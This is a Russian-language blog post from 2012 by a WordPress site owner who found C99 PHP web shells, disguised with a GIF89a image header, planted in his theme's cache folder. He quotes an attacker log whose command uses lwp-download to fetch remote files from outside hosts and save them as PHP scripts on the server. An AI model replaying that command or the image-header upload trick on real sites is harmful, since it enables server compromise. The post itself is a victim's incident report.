А умато больше не на что то не хватило как базу снести?
Школоло! Учи уроки

Мона Лиза

Сегодня обнаружил что мой блог усердно кем-то узается оО, кому и зачем понадобилась моя помойка? Кстати ни с того не с сего Яша выдал мне ТИЦ, я конечно вахуе от этого, не ждал и не надеялся, да и не нужно было, но видимо некоторые статьи написанные своей рукой дали вес. Ну да ладно не об этом, как я уже писал поменял место работы, пока все устаканивается, проводится интернет, покупается сервак и рабочий комп, так как для меня в организации открыли должность, скажу  должность не их хуёвых J. На время пришлось забить на блог, и тут на тебе зашел сегодня а там лежат непонятные мне файлы, точнее я то сразу вкурил что это, шеллами и сам пользовался но просто увидеть у себя на блоге их не ожидал. Не много по изучав, дошло что все это делается на чистом автомате, хз откуда. В папке с темой появилась папочка cache, в ней лежали файлы.

Бегло глянув не нашел ни чего интересного обычные Shell C99  НО в начинается он со строчки GIF89a???????????!?????,???????[1][1]D?;?  и дальше php код пошел, GIF89, это же формат изображения  понятно  как то залили шел через загрузку картинок и подозреваю связанно это  с недавним зарегистрировавшимся дядькой под ник уже и не помню, удалил и забыл. Но те логии что я обнаружил явно не дело машины. тут прям блять целая сеть шеллов задействована, эх бля как я завидую хозяину такого ботнета. По адресам, кстать лежит скрипт отправки  почты, и скрипт Шела, довольно таки хорошего вида :)

___________________________________________________________________________

Day                 : Tue, 10 Apr 2012 00:35:44 +0400

IP                    : 211.45.113.143

Browser                      : Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Url                   : /wp-content/themes/AskIt/cache/c947b568cbf5ef5a57eb244031b70d5b.php

Last Command            : lwp-download -a http://www.zeroninefive.com/f.txt font.php;ls -al font.php;lwp-download -a http://hochwertige-kundengeschenke.de/wp/c.txt ok.php;ls -al ok.php;unzip -v

_____________________________________________________________________________

Если кто поделится каким это образом реализовано буду премного благодарен!

 

 

Поделитесь со своими друзьями!

Опубликовать в Одноклассники
Опубликовать в Мой Мир
Опубликовать в Яндекс
Опубликовать в Google Plus
Опубликовать в Google Buzz
Опубликовать в LiveJournal